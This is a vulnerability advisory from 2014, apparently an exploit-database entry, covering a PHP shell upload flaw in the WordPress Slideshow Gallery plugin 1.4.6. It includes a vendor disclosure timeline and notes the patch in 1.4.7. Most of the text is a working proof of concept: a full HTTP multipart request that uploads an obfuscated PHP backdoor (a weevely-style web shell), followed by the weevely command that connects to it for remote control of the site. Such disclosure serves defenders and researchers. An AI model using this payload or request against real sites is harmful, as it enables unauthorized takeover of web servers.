110 lines
No EOL
5 KiB
Text
110 lines
No EOL
5 KiB
Text
Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
|
|
Found by: Jesus Ramirez Pichardo
|
|
@whitexploit
|
|
http://whitexploit.blogspot.mx/
|
|
Date: 2014-08-28
|
|
Vendor Homepage: http://tribulant.com/
|
|
Software: Slideshow Gallery
|
|
Version: 1.4.6
|
|
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
|
|
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
|
|
|
|
Description:
|
|
|
|
I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
|
|
|
|
Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
|
|
|
|
Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
|
|
|
|
Proof of Concept (PoC):
|
|
|
|
1. An attacker uploads a PHP shell file (i.e. backdoor.php):
|
|
|
|
POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
|
|
Host: 192.168.31.128
|
|
Connection: keep-alive
|
|
Content-Length: 2168
|
|
Cache-Control: max-age=0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
|
|
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
|
|
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[id]"
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[order]"
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[title]"
|
|
|
|
Test Shell Upload
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[description]"
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[showinfo]"
|
|
|
|
both
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[iopacity]"
|
|
|
|
70
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[galleries][]"
|
|
|
|
1
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[type]"
|
|
|
|
file
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php
|
|
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
|
|
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
|
|
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
|
|
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
|
|
?>
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[image_url]"
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[uselink]"
|
|
|
|
N
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[link]"
|
|
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="Slide[linktarget]"
|
|
|
|
self
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
Save Slide
|
|
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
|
|
|
|
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
|
|
|
|
3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
|
|
|
|
#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
|
|
|
|
Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
|
|
vulnerable website.
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
2014-08-28: Discovered vulnerability
|
|
2014-08-29: Vendor Notification (support@tribulant.com)
|
|
2014-08-29: Vendor Response/Feedback
|
|
2014-08-29: Vendor Fix/Patch
|
|
2014-08-30: Public Disclosure |